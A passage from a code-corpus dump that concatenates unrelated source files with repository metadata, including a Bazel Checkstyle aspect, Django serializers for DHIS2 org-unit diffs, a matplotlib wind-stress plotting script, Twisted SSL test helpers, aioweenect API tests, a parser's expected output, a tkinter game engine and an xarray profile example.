'output_file': "The output file generated by `checkstyle_aspect`. This will be `None` if the target doesn't include any Java sources to be checked.",
}
)
def _extract_java_executable(aspect_ctx):
return aspect_ctx.toolchains[_JAVA_RUNTIME_TOOLCHAIN_TYPE] \
.java_runtime_toolchain_info \
.java_executable
def _extract_class_path_separator(aspect_ctx):
return aspect_ctx.toolchains[_JAVA_RUNTIME_TOOLCHAIN_TYPE] \
.java_runtime_toolchain_info \
.class_path_separator
def _file_name(target, suffix):
return "{}.checkstyle.{}".format(target.label.name, suffix)
def _checkstyle_aspect_impl(target, aspect_ctx):
# Skip a target if it doesn't provide a `JavaCompilationInfo`.
if JavaCompilationInfo not in target:
return [CheckstyleAspectInfo()]
# Extract some information from the environment for brevity.
actions = aspect_ctx.actions
srcs = target[JavaCompilationInfo].srcs
srcs_args_file = target[JavaCompilationInfo].srcs_args_file
class_path_separator = _extract_class_path_separator(aspect_ctx)
java_executable = _extract_java_executable(aspect_ctx)
checkstyle_toolchain_info = extract_checkstyle_toolchain_info(aspect_ctx)
checkstyle_java_info = checkstyle_toolchain_info.checkstyle_java_info
# Declare an output log file for Checkstyle to write to.
log_file = actions.declare_file(_file_name(target, "log"))
# Create an args file containing Checkstyle's run-time class path.
# TODO(dwtj): Move this into the toolchain so that it isn't re-created in
# every instantiation/application of the `checkstyle_aspect`.
class_path_args = actions.args()
class_path_args.add_joined(
checkstyle_java_info.transitive_runtime_jars,
join_with = class_path_separator,
omit_if_empty = False,
)
class_path_args_file = actions.declare_file(_file_name(target, "class_path.args"))
actions.write(
class_path_args_file,
content = class_path_args,
is_executable = False,
)
# Instantiate a script which will run Checkstyle from a template.
run_checkstyle_script = actions.declare_file(_file_name(target, "sh"))
actions.expand_template(
template = aspect_ctx.file._run_checkstyle_script_template,
output = run_checkstyle_script,
substitutions = {
"{JAVA_EXECUTABLE}": java_executable.path,
"{JAVA_SOURCES_ARGS_FILE}": srcs_args_file.path,
"{CHECKSTYLE_CLASS_PATH_ARGS_FILE}": class_path_args_file.path,
"{CHECKSTYLE_LOG_FILE}": log_file.path,
},
is_executable = True,
)
# Lastly, run our Checkstyle script on the target's srcs:
actions.run(
executable = run_checkstyle_script,
inputs = depset(
direct = [
java_executable,
srcs_args_file,
class_path_args_file,
],
transitive = [
srcs,
checkstyle_java_info.transitive_runtime_jars,
]
),
outputs = [log_file],
mnemonic = "Checkstyle",
progress_message = "Using Checkstyle to check Java sources of Java target `{}`".format(target.label),
use_default_shell_env = False,
)
return [
OutputGroupInfo(default = [log_file]),
CheckstyleAspectInfo(output_file = log_file)
]
checkstyle_aspect = aspect(
implementation = _checkstyle_aspect_impl,
provides = [CheckstyleAspectInfo],
attrs = {
"_run_checkstyle_script_template": attr.label(
default = "@dwtj_rules_java//java:aspects/checkstyle_aspect/TEMPLATE.run_checkstyle.sh",
allow_single_file = True,
),
},
toolchains = [
'@dwtj_rules_java//java/toolchains/checkstyle_toolchain:toolchain_type',
'@dwtj_rules_java//java/toolchains/java_runtime_toolchain:toolchain_type',
],
)
| 2.28125 | 2 |
iaso/api/source_versions_serializers.py | BLSQ/iaso-copy | 0 | 12770834 | <filename>iaso/api/source_versions_serializers.py
import logging
import sys
from io import StringIO
from rest_framework import serializers
from iaso.diffing import Differ, Dumper
from iaso.management.commands.command_logger import CommandLogger
from iaso.models import SourceVersion, OrgUnit, OrgUnitType, Task
from iaso.tasks.dhis2_ou_exporter import dhis2_ou_exporter
logger = logging.getLogger(__name__)
STATUSES = list(OrgUnit.VALIDATION_STATUS_CHOICES) + [("", "all")]
FIELDS = ["name", "parent", "geometry", "groups"]
class DiffSerializer(serializers.Serializer):
ref_version_id = serializers.PrimaryKeyRelatedField(
queryset=SourceVersion.objects.all(), style={"base_template": "select.html"}
)
source_version_id = serializers.PrimaryKeyRelatedField(
queryset=SourceVersion.objects.all(), style={"base_template": "select.html"}
)
source_status = serializers.ChoiceField(required=False, choices=STATUSES)
source_top_org_unit_id = serializers.PrimaryKeyRelatedField(
required=False, default=None, queryset=OrgUnit.objects.all(), allow_null=True
)
source_org_unit_type_ids = serializers.PrimaryKeyRelatedField(
required=False,
default=[],
queryset=OrgUnitType.objects.all(),
many=True,
style={"base_template": "select_multiple.html"},
)
ref_org_unit_type_ids = serializers.PrimaryKeyRelatedField(
required=False,
default=[],
queryset=OrgUnitType.objects.all(),
many=True,
style={"base_template": "select_multiple.html"},
)
ref_top_org_unit_id = serializers.PrimaryKeyRelatedField(
required=False, default=None, queryset=OrgUnit.objects.all(), allow_null=True
)
ref_status = serializers.ChoiceField(required=False, choices=STATUSES)
fields_to_export = serializers.MultipleChoiceField(choices=FIELDS)
def validate(self, attrs):
validated_data = super().validate(attrs)
account = self.context["request"].user.iaso_profile.account
versions = SourceVersion.objects.filter(data_source__projects__account=account)
if validated_data["ref_version_id"] not in versions:
raise serializers.ValidationError({"ref_version_id": ["Unauthorized ref_version_id"]})
if validated_data["source_version_id"] not in versions:
raise serializers.ValidationError({"source_version_id": ["Unauthorized source_version_id"]})
if (
validated_data.get("source_top_org_unit_id")
and validated_data["source_top_org_unit_id"].version != validated_data["source_version_id"]
):
raise serializers.ValidationError({"source_top_org_unit_id": ["not in source_version_id"]})
if (
validated_data.get("ref_top_org_unit_id")
and validated_data["ref_top_org_unit_id"].version != validated_data["ref_version_id"]
):
raise serializers.ValidationError({"ref_top_org_unit_id": ["not in ref_version_id"]})
if validated_data.get("fields_to_export"):
validated_data["fields_to_export"] = list(validated_data["fields_to_export"])
return validated_data
def generate_csv(self):
data = self.validated_data
iaso_logger = CommandLogger(sys.stdout)
if "groups" in data["fields_to_export"]:
data["fields_to_export"].remove("groups")
ignore_groups = False
else:
ignore_groups = True
diffs, fields = Differ(iaso_logger).diff(
data["ref_version_id"],
data["source_version_id"],
ignore_groups=ignore_groups,
show_deleted_org_units=True,
validation_status=data.get("source_status"),
validation_status_ref=data.get("ref_status"),
top_org_unit=data.get("source_top_org_unit_id"),
top_org_unit_ref=data.get("ref_top_org_unit_id"),
org_unit_types=data.get("source_org_unit_type_ids"),
org_unit_types_ref=data.get("ref_org_unit_type_ids"),
field_names=data.get("fields_to_export"),
)
buffer = StringIO()
Dumper(iaso_logger).dump_as_csv(diffs, fields, buffer)
buffer.seek(0)
return buffer
class ExportSerializer(DiffSerializer):
# use same field as diff serializer
def validate(self, attrs):
validated_data = super().validate(attrs)
source_version = validated_data["source_version_id"]
credentials = source_version.data_source.credentials
if not (credentials and credentials.is_valid):
raise serializers.ValidationError({"source_version_id": ["No valid DHIS2 configured on source"]})
return validated_data
def launch_export(self, user):
# use data and not validated data so we have the id
data = self.data
if "groups" in data["fields_to_export"]:
data["fields_to_export"].remove("groups")
ignore_groups = False
else:
ignore_groups = True
task: Task = dhis2_ou_exporter(
ref_version_id=data["ref_version_id"],
version_id=data["source_version_id"],
ignore_groups=ignore_groups,
show_deleted_org_units=True,
validation_status=data.get("source_status"),
ref_validation_status=data.get("ref_status"),
top_org_unit_id=data.get("source_top_org_unit_id"),
top_org_unit_ref_id=data.get("ref_top_org_unit_id"),
org_unit_types_ids=data.get("source_org_unit_type_ids"),
org_unit_types_ref_ids=data.get("ref_org_unit_type_ids"),
field_names=list(data["fields_to_export"]),
user=user,
)
return task
| 1.921875 | 2 |
GEOS_Util/coupled_diagnostics/verification/stress_mon_clim/stress_qscat.py | GEOS-ESM/GMAO_Shared | 1 | 12770835 | #!/bin/env python
import os
import scipy as sp
import matplotlib.pyplot as pl
from mpl_toolkits.basemap.cm import sstanom, s3pcpn_l
from matplotlib import dates
from g5lib import field
# Read validation data set
obs={}
path=os.environ['NOBACKUP']+'/verification/stress_mon_clim'
execfile(path+'/ctl.py')
obs['ctl']=ctl
tx=ctl.fromfile('taux',kind=0).clim(12); tx.data*=10
ty=ctl.fromfile('tauy',kind=0).clim(12); ty.data*=10
tx.shiftgrid(30.);
tx.grid['lon']=sp.where(tx.grid['lon']<29.,tx.grid['lon']+360,\
tx.grid['lon'])
ty.shiftgrid(30.);
ty.grid['lon']=sp.where(ty.grid['lon']<29.,ty.grid['lon']+360,\
ty.grid['lon'])
var=field.cmplx(tx,ty); var.name=ctl.name+' TAU'
ind=[0,1,11]; obs['djf']=var.subset(tind=ind).ave(0); obs['djf'].name+=', DJF'
ind=[5,6,7]; obs['jja']=var.subset(tind=ind).ave(0); obs['jja'].name+=', JJA'
obs['am']=var.ave(0); obs['am'].name+=', Annual Mean'
# Calculate equatorial profile
lonind=sp.logical_and(var.grid['lon'][0]>=130.0,var.grid['lon'][0]<=280.0)
latind=sp.logical_and(var.grid['lat'][:,0]>=-2.1,var.grid['lat'][:,0]<=2.0)
obs['eqprof']=obs['am'].subset(iind=lonind,jind=latind).ave(2)
# Equatorial Annual Cycle
obs['eqac']=var.subset(iind=lonind,jind=latind).ave(2)
obs['eqac'].data-=obs['eqac'].ave(0).data
obs['eqac'].name=var.name+', Eq. Annual Cycle'
# Plots
path=os.environ['NOBACKUP']+'/verification/stress_mon_clim/pics'
copts1={}
copts1['levels']=(0.,0.2,0.4,0.6,0.8,1.,1.5,2,2.5,3)
copts1['cmap']=s3pcpn_l
def plot_map(figure,F,copts):
Nq=10
x=field.absolute(F)
pl.figure(figure); pl.clf()
x.copts=copts
x.plot_map()
F.plot_quiver(Nq)
pl.show()
# DJF
season='djf'
plot_map(1,obs[season],copts1)
pl.savefig(path+'/tau_'+season+'_qscat.png')
# JJA
season='jja'
plot_map(1,obs[season],copts1)
pl.savefig(path+'/tau_'+season+'_qscat.png')
# AM
season='am'
plot_map(1,obs[season],copts1)
pl.savefig(path+'/tau_'+season+'_qscat.png')
# Plot Equatorial Annual Cycle
pl.figure(2);pl.clf()
obs['eqac'].copts={'levels': sp.arange(-0.2,0.21,0.02),\
'cmap' : sstanom,\
'timefmt': dates.DateFormatter('%b')}
obs['eqac'].plot2d()
obs['eqac'].copts={'func': pl.contour,\
'colors': 'black',\
'levels': sp.arange(-0.2,0.21,0.04),\
'timefmt': dates.DateFormatter('%b')}
obs['eqac'].plot2d()
ax=pl.gca(); ax.yaxis.set_major_locator(dates.MonthLocator())
ax.set_title(obs['ctl'].name+' Eq. Annual cycle')
pl.grid(); pl.show()
pl.savefig(path+'/taux_eq_ac_qscat.png')
| 1.820313 | 2 |
IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/test/ssl_helpers.py | timkrentz/SunTracker | 4 | 12770836 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Helper classes for twisted.test.test_ssl.
They are in a separate module so they will not prevent test_ssl importing if
pyOpenSSL is unavailable.
"""
from __future__ import division, absolute_import
from twisted.python.compat import nativeString
from twisted.internet import ssl
from twisted.python.filepath import FilePath
from OpenSSL import SSL
certPath = nativeString(FilePath(__file__.encode("utf-8")
).sibling(b"server.pem").path)
class ClientTLSContext(ssl.ClientContextFactory):
isClient = 1
def getContext(self):
return SSL.Context(SSL.TLSv1_METHOD)
class ServerTLSContext:
isClient = 0
def __init__(self, filename=certPath):
self.filename = filename
def getContext(self):
ctx = SSL.Context(SSL.TLSv1_METHOD)
ctx.use_certificate_file(self.filename)
ctx.use_privatekey_file(self.filename)
return ctx
| 2.140625 | 2 |
microscopeimagequality/constants.py | MihailSalnikov/microscopeimagequality | 77 | 12770837 | <gh_stars>10-100
"""Common constants used across image quality modules."""
VALID_MASK_FORMAT = 'valid_mask_%s'
CERTAINTY_MASK_FORMAT = 'certainty_mask_%s'
PREDICTIONS_MASK_FORMAT = 'predictions_mask_%s'
ORIG_IMAGE_FORMAT = 'orig_name=%s'
PATCH_SIDE_LENGTH = 84
REMOTE_MODEL_CHECKPOINT_PATH = "https://storage.googleapis.com/microscope-image-quality/static/model/model.ckpt-1000042"
| 1.039063 | 1 |
tests/test_aioweenect.py | eifinger/aioweenect | 1 | 12770838 | <reponame>eifinger/aioweenect
"""Tests for `aioweenect.aioweenect`."""
import json
import os
from typing import Any
import aiohttp
import pytest
from aioweenect import AioWeenect
API_HOST = "apiv4.weenect.com"
API_VERSION = "/v4"
@pytest.mark.asyncio
async def test_get_user_with_invalid_token(aresponses):
"""Test getting user information with a timed out token."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/user/100000",
"GET",
aresponses.Response(
body="{"
'"description": "Signature has expired",'
'"error": "Invalid token",'
'"status_code": 401'
"}",
status=401,
),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/user/100000",
"GET",
response=load_json_fixture("get_user_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.get_user("100000")
assert response["postal_code"] == "55128"
@pytest.mark.asyncio
async def test_get_user(aresponses):
"""Test getting user information."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/user/100000",
"GET",
response=load_json_fixture("get_user_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.get_user("100000")
assert response["postal_code"] == "55128"
@pytest.mark.asyncio
async def test_get_subscription_offers(aresponses):
"""Test getting subscription offer information."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/subscriptionoffer",
"GET",
response=load_json_fixture("get_subscription_offer_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.get_subscription_offers()
assert (
response["items"][0]["option_offers"][0]["price_offer"]["de"]["amount"]
== 199
)
@pytest.mark.asyncio
async def test_get_subscription(aresponses):
"""Test getting subscription information."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mysubscription/100000",
"GET",
response=load_json_fixture("get_subscription_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.get_subscription("100000")
assert response["options"][0]["amount"] == 99
@pytest.mark.asyncio
async def test_get_zones(aresponses):
"""Test getting zone information."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/zones",
"GET",
response=load_json_fixture("get_zones_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.get_zones("100000")
assert response["items"][0]["distance"] == 100
@pytest.mark.asyncio
async def test_add_zone(aresponses):
"""Test adding a zone."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/zones",
"POST",
response=load_json_fixture("add_zone_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.add_zone(
tracker_id="100000",
address="test",
latitude=90.0,
longitude=1.0,
name="test",
)
assert response["number"] == 186177
@pytest.mark.asyncio
async def test_remove_zone(aresponses):
"""Test removing a zone."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/zones/100000",
"DELETE",
aresponses.Response(text="", status=204),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.remove_zone(tracker_id="100000", zone_id="100000")
assert response is None
@pytest.mark.asyncio
async def test_get_position(aresponses):
"""Test getting position information."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/position",
"GET",
response=load_json_fixture("get_position_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.get_position(
tracker_id="100000",
start="2019-04-14T23:05:00.000Z",
end="2019-04-15T23:05:00.000Z",
)
assert response[0]["latitude"] == 49.0268016
@pytest.mark.asyncio
async def test_get_activity(aresponses):
"""Test getting activity information."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/activity",
"GET",
response=load_json_fixture("get_activity_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.get_activity(
tracker_id="100000",
start="2019-04-14T23:05:00.000Z",
end="2019-04-15T23:05:00.000Z",
)
assert response["distance"] == 31246.108984983595
@pytest.mark.asyncio
async def test_get_trackers(aresponses):
"""Test getting tracker information."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker",
"GET",
response=load_json_fixture("get_trackers_response.json"),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.get_trackers()
assert response["items"][0]["user"]["firstname"] == "Test"
@pytest.mark.asyncio
async def test_set_update_interval(aresponses):
"""Test setting the update interval."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/mode",
"POST",
aresponses.Response(text="", status=204),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.set_update_interval(
tracker_id="100000", update_interval="30M"
)
assert response is None
@pytest.mark.asyncio
async def test_activate_super_live(aresponses):
"""Test activating super live mode."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/st-mode",
"POST",
aresponses.Response(text="", status=204),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.activate_super_live(tracker_id="100000")
assert response is None
@pytest.mark.asyncio
async def test_refresh_location(aresponses):
"""Test requesting a location refresh."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/position/refresh",
"POST",
aresponses.Response(text="", status=204),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.refresh_location(tracker_id="100000")
assert response is None
@pytest.mark.asyncio
async def test_vibrate(aresponses):
"""Test sending a vibration command."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/vibrate",
"POST",
aresponses.Response(text="", status=204),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.vibrate(tracker_id="100000")
assert response is None
@pytest.mark.asyncio
async def test_ring(aresponses):
"""Test sending a ring command."""
aresponses.add(
API_HOST,
f"{API_VERSION}/user/login",
"POST",
response=load_json_fixture("login_response.json"),
)
aresponses.add(
API_HOST,
f"{API_VERSION}/mytracker/100000/ring",
"POST",
aresponses.Response(text="", status=204),
)
async with aiohttp.ClientSession() as session:
aioweenect = AioWeenect(username="user", password="password", session=session)
response = await aioweenect.ring(tracker_id="100000")
assert response is None
def load_json_fixture(filename: str) -> Any:
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
content = fptr.read()
json_content = json.loads(content)
return json_content
| 2.421875 | 2 |
python/testData/intentions/PyConvertTypeCommentToVariableAnnotationIntentionTest/typeHintFollowedByComment_after.py | jnthn/intellij-community | 2 | 12770839 | <gh_stars>1-10
var: int = undefined()
| 0.84375 | 1 |
drl/envs/wrappers/stateless/test_clip_reward.py | lucaslingle/pytorch_drl | 0 | 12770840 | from drl.envs.testing import LockstepEnv
from drl.envs.wrappers.stateless.clip_reward import ClipRewardWrapper
def test_clip_reward():
env = LockstepEnv()
wrapped = ClipRewardWrapper(env, low=0.0, high=0.5, key='extrinsic')
_ = wrapped.reset()
o_tp1, r_t, d_t, i_t = wrapped.step(0)
assert r_t['extrinsic'] == 0.5
wrapped2 = ClipRewardWrapper(wrapped, low=0.0, high=0.25, key='extrinsic')
_ = wrapped2.reset()
o_tp1, r_t, d_t, i_t = wrapped2.step(0)
assert r_t['extrinsic'] == 0.25
| 2.046875 | 2 |
src/genie/libs/parser/iosxe/tests/c9300/ShowControllers/cli/equal/golden_output_expected.py | balmasea/genieparser | 0 | 12770841 | expected_output = {
"interface_name": "Gi1/0/1",
"if_id": "75",
"phy_registers": {
"0": {
"register_number": "0000",
"hex_bit_value": "1140",
"register_name": "Control Register",
"bits": "0001000101000000",
},
"1": {
"register_number": "0001",
"hex_bit_value": "796d",
"register_name": "Control STATUS",
"bits": "0111100101101101",
},
"2": {
"register_number": "0002",
"hex_bit_value": "ae02",
"register_name": "Phy(B:D3A6) ID 1",
"bits": "1010111000000010",
},
"3": {
"register_number": "0003",
"hex_bit_value": "5011",
"register_name": "Phy(B:D3A6) ID 2",
"bits": "0101000000010001",
},
"4": {
"register_number": "0004",
"hex_bit_value": "01e1",
"register_name": "Auto-Negotiation Advertisement",
"bits": "0000000111100001",
},
"5": {
"register_number": "0005",
"hex_bit_value": "c1e1",
"register_name": "Auto-Negotiation Link Partner",
"bits": "1100000111100001",
},
"6": {
"register_number": "0006",
"hex_bit_value": "006d",
"register_name": "Auto-Negotiation Expansion Reg",
"bits": "0000000001101101",
},
"7": {
"register_number": "0007",
"hex_bit_value": "2001",
"register_name": "Next Page Transmit Register",
"bits": "0010000000000001",
},
"8": {
"register_number": "0008",
"hex_bit_value": "4e92",
"register_name": "Link Partner Next page Register ",
"bits": "0100111010010010",
},
"9": {
"register_number": "0009",
"hex_bit_value": "0e00",
"register_name": "1000T Base Control",
"bits": "0000111000000000",
},
"10": {
"register_number": "0010",
"hex_bit_value": "0001",
"register_name": "PHY Specific Control",
"bits": "0000000000000001",
},
"11": {
"register_number": "0011",
"hex_bit_value": "1303",
"register_name": "PHY Specific Status",
"bits": "0001001100000011",
},
"12": {
"register_number": "0012",
"hex_bit_value": "0000",
"register_name": "PHY Specific Interrupt Enable",
"bits": "0000000000000000",
},
"13": {
"register_number": "0013",
"hex_bit_value": "0000",
"register_name": "PHY Specific Interrupt Status",
"bits": "0000000000000000",
},
"14": {
"register_number": "003d",
"hex_bit_value": "c000",
"register_name": "EEE Test Ctrl(0x803D)",
"bits": "1100000000000000",
},
"15": {
"register_number": "0001",
"hex_bit_value": "0046",
"register_name": "EEE PCS Status1(0x1)",
"bits": "0000000001000110",
},
"16": {
"register_number": "0014",
"hex_bit_value": "0006",
"register_name": "EEE Capability Reg(0x14)",
"bits": "0000000000000110",
},
"17": {
"register_number": "003c",
"hex_bit_value": "0000",
"register_name": "EEE Advertisement Ctrl(0x3C)",
"bits": "0000000000000000",
},
"18": {
"register_number": "003d",
"hex_bit_value": "0000",
"register_name": "EEE Link Partnet Advrt(0x3D)",
"bits": "0000000000000000",
},
"19": {
"register_number": "003e",
"hex_bit_value": "0000",
"register_name": "EEE Resolution Status(0x803E)",
"bits": "0000000000000000",
},
"20": {
"register_number": "001a",
"hex_bit_value": "247e",
"register_name": "Cu Interrupt Status(0x1A)",
"bits": "0010010001111110",
},
"21": {
"register_number": "001b",
"hex_bit_value": "0f7e",
"register_name": "Cu Interrupt Mask(0x1B)",
"bits": "0000111101111110",
},
"22": {
"register_number": "001e",
"hex_bit_value": "0000",
"register_name": "Test 1 Reg(0x1E)",
"bits": "0000000000000000",
},
"23": {
"register_number": "002a",
"hex_bit_value": "06c2",
"register_name": "Cu Power MII Ctrl RDB(0x02A)",
"bits": "0000011011000010",
},
"24": {
"register_number": "002c",
"hex_bit_value": "4004",
"register_name": "Cu Misc Test RDB(0x02C)",
"bits": "0100000000000100",
},
"25": {
"register_number": "0003",
"hex_bit_value": "82f3",
"register_name": "DTE MII Control(0x03)",
"bits": "1000001011110011",
},
"26": {
"register_number": "0007",
"hex_bit_value": "7277",
"register_name": "Cu Misc Cntrl Reg(0x07)",
"bits": "0111001001110111",
},
"27": {
"register_number": "00e4",
"hex_bit_value": "0000",
"register_name": "10Base-T Radiation RDB Reg(0x01e4)",
"bits": "0000000000000000",
},
"28": {
"register_number": "00ea",
"hex_bit_value": "0100",
"register_name": "10Base-T Radiation RDB Reg(0x01ea)",
"bits": "0000000100000000",
},
"29": {
"register_number": "0021",
"hex_bit_value": "7ea8",
"register_name": "RDB Reg(0x21)",
"bits": "0111111010101000",
},
"30": {
"register_number": "002b",
"hex_bit_value": "82f3",
"register_name": "RDB Reg(0x2B)",
"bits": "1000001011110011",
},
"31": {
"register_number": "002f",
"hex_bit_value": "7277",
"register_name": "RDB Reg(0x2F)",
"bits": "0111001001110111",
},
"32": {
"register_number": "0009",
"hex_bit_value": "871c",
"register_name": "RDB Reg(0x09)",
"bits": "1000011100011100",
},
"33": {
"register_number": "000c",
"hex_bit_value": "8800",
"register_name": "RDB Reg(0x0C)",
"bits": "1000100000000000",
},
"34": {
"register_number": "0019",
"hex_bit_value": "871c",
"register_name": "Cu Aux Status Summary(0x19)",
"bits": "1000011100011100",
},
},
}
| 1.421875 | 1 |
GameEngine/Application.py | Nathcat/2D-GameEngine | 0 | 12770842 | from tkinter import *
from PIL import ImageTk, Image
from GameEngine.Vector import *
class Application:
def __init__(self, title, size, fps):
self.root = Tk()
self.root.title(title)
self.width, self.height = size
self.root.geometry(f"{self.width}x{self.height}")
self.root.bind("<Key>", self.__handle_key_press)
self.fps = fps
self.__widgets = []
self.__task_list = []
self.__game_objects = []
self.__action_listeners = []
self.root.after(int((1 / self.fps) * 1000), self.new_frame)
def render_window(self):
for slave in self.root.slaves():
slave.destroy()
for widget in self.__widgets:
widget[0].place(x=widget[1], y=widget[2])
self.execute_task_list()
self.root.after(int((1 / self.fps) * 1000), self.new_frame)
def new_frame(self):
sprites = []
for obj in self.__game_objects:
render_result = obj.render()
if render_result is not None:
sprites.append((render_result, obj.position, obj.rotation))
frame = Frame((self.width, self.height))
for sprite in sprites:
frame.write_sprite(sprite)
frame = ImageTk.PhotoImage(frame.image)
self.__widgets = [
[
Label(self.root, image=frame),
0, 0
]
]
self.__widgets[0][0].image = frame
self.render_window()
def execute_task_list(self):
for task in self.__task_list:
task()
def add_object(self, object):
self.__game_objects.append(object)
self.__task_list.append(object.update)
def add_action_listener(self, obj):
self.__action_listeners.append(obj)
def __handle_key_press(self, event):
for action_listener in self.__action_listeners:
if action_listener.key == event.char:
action_listener.action()
def bind_special_key(self, key_name, f):
self.root.bind(key_name, f)
class Frame:
def __init__(self, size):
self.width, self.height = size
self.image = Image.new("RGBA", size=(self.width, self.height))
self.image.putdata([(0, 0, 0, 255) for i in range(0, self.width * self.height)])
def write_sprite(self, sprite_data):
sprite, position, rotation = sprite_data
pixels_ = self.image.getdata()
pixels = []
p_counter = 0
for y in range(0, self.image.height):
pixels.append([])
for x in range(0, self.image.width):
pixels[y].append(pixels_[p_counter])
p_counter += 1
sprite_pixels_ = sprite.getdata()
sprite_pixels = []
p_counter = 0
for y in range(0, sprite.height):
sprite_pixels.append([])
for x in range(0, sprite.width):
sprite_pixels[y].append(sprite_pixels_[p_counter])
p_counter += 1
p_counter = 0
write_position = position
pixel_position = Vector()
for y in range(0, len(sprite_pixels)):
for x in range(0, len(sprite_pixels[pixel_position.y])):
pixels[write_position.y][write_position.x] = sprite_pixels[pixel_position.y][pixel_position.x]
p_counter += 1
write_position += Vector(1, 0)
pixel_position += Vector(1, 0)
pixel_position.x = 0
pixel_position.y += 1
write_position.x = position.x
write_position.y += 1
new_data = []
for y in range(0, len(pixels)):
for x in range(0, len(pixels[y])):
new_data.append(pixels[y][x])
self.image.putdata(new_data)
| 2.859375 | 3 |
hello-xarray/write_profile.py | NIVANorge/s-enda-playground | 0 | 12770843 | #%%
from datetime import datetime
import xarray as xr
from cfxarray.profile import depthcoords, profiledataset
from cfxarray.base import dataarraybydepth
# %%
temperature1 = dataarraybydepth(
name="temperature",
standard_name="sea_water_temperature",
long_name="Sea water temperature",
units="degree_Celsius",
data=[10, 15],
).assign_coords(
depthcoords(
depth=[1, 2],
time=datetime.fromisoformat("1970-01-01T00:00:00"),
latitude=59.95,
longitude=10.75,
)
)
# %%
ds1 = profiledataset([temperature1], "profile1", "title", "summary", ["keyword"])
# %%
temperature2 = dataarraybydepth(
name="temperature",
standard_name="sea_water_temperature",
long_name="Sea water temperature",
units="degree_Celsius",
data=[20, 255, 2000, 100],
).assign_coords(
depthcoords(
depth=[1, 2, 10, 20],
time=datetime.fromisoformat("1980-01-01T00:00:00"),
latitude=59.95,
longitude=10.75,
)
)
# %%
ds2 = profiledataset([temperature2], "profile2", "title", "summary", ["keyword"])
# %%
ds = xr.concat([ds1, ds2], dim="profile_name")
# %%
ds.temperature.sel(profile_name="profile1").plot.line("o")
# %%
| 2.0625 | 2 |
utils/selenium_utils.py | Brandonthe/oosbot | 0 | 12770844 | from chromedriver_py import binary_path as driver_path
from selenium.webdriver import DesiredCapabilities
